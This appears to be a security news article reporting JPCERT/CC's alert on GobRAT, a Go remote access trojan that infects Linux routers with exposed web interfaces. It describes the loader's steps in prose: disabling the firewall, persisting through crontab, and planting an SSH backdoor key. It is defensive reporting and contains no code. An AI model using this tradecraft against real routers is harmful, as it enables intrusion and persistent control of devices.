JPCERT/CC is warning of cyberattacks against Linux routers in Japan that have been infected with a new Golang remote access trojan (RAT) called GobRAT.
Threat actors are targeting Linux routers with publicly exposed WEBUI to execute malicious scripts to deploy the GobRAT malware.
“Initially, the attacker targets a router whose WEBUI is open to the public, executes scripts possibly by using vulnerabilities, and finally infects the GobRAT.” reads the alert published by the JPCERT Coordination Center (JPCERT/CC).
Loader Script acts as a loader, it supports multiple functions for downloading and deploying the GobRAT. The experts noticed an SSH public key, likely used as a backdoor, which is hard-coded in the script. The Loader Script maintains persistence via crontab because GobRAT does not support such a function.
The Loader Script includes multiple functions, such as disabling Firewall, downloading GobRAT for the target machine’s architecture, creating Start Script and making it persistent, creating and running the Daemon Script, and registering a SSH public key in /root/.ssh/authorized_keys.
The RAT communicates with C2 server via TLS and can execute various commands. The Japan CERT reported that the RAT is packed with UPX version 4 series. The researchers observed samples for multiple architectures, including ARM, MIPS, x86, and x86-64.
Upon starting up, the GobRAT checks IP address and MAC address of itself, uptime by uptime command, network communication status by /proc/net/dev.
The malware supports 22 commands, the researchers have identified the following commands:
“In recent years, different types of malware using Go language have been confirmed, and the GobRAT malware confirmed this time uses gob, which can only be handled by Go language, for communication.” concludes the alert that also provides indicators of compromise. “Please continuously beware of malware that infects routers, not limited to GobRAT, since they are difficult to detect.”
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, malware)
Ivanti warned of a new Cloud Services Appliance (CSA) vulnerability that is being exploited in…
An international law enforcement operation infiltrated the encrypted messaging app Ghost, which was widely used…
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft Windows, Apache HugeGraph-Server, Oracle JDeveloper, Oracle…
Small and medium-sized enterprises (SMEs) are a frequent target for cybercriminals. How can SIEM help…
Russian anti-virus firm Doctor Web (Dr.Web) disconnected all servers following a cyberattack over the weekend.…
Researchers warn of a new IoT botnet called Raptor Train that already compromised over 200,000…
This website uses cookies.